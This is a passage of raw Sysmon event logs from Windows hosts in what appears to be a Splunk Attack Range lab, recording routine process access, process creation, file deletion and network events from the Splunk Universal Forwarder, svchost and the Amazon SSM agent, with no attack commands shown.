Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222759Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:47.178{4F8D34B0-197F-6216-4A05-000000003902}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000222787Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:48.994{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222786Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:48.994{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222785Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:48.994{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222784Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:48.994{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222783Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:48.994{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222782Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:48.994{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222781Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:48.994{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222780Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:48.994{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222779Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:48.994{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1980-6216-4B05-000000003902}1112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222778Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:48.994{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1980-6216-4B05-000000003902}1112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222777Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:48.995{4F8D34B0-1980-6216-4B05-000000003902}1112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298942Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:48.475{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=673D363C94629C8251EA5DE0CA00E2E6,SHA256=1F5C001344D65310C3899D52BE7C8BF21D6F07A88D46C08BCE5377376CBB246A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222776Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:48.653{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-167MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222775Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:46.184{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51739-false10.0.1.12-8089- 23542300x8000000000000000298943Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:49.490{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E0C2C2362F974B60771302C885E9764,SHA256=11192981F227AFF8D1DA50B86F7D4815ADE7448B68D7088E15908246DD34997D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222807Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:49.883{4F8D34B0-1981-6216-4C05-000000003902}2163528C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222806Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:49.665{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1981-6216-4C05-000000003902}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222805Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:49.663{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222804Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:49.663{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222803Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:49.662{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222802Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:49.662{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222801Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:49.662{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222800Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:49.662{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222799Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:49.662{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222798Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:49.662{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1981-6216-4C05-000000003902}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222797Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:49.662{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222796Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:49.662{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51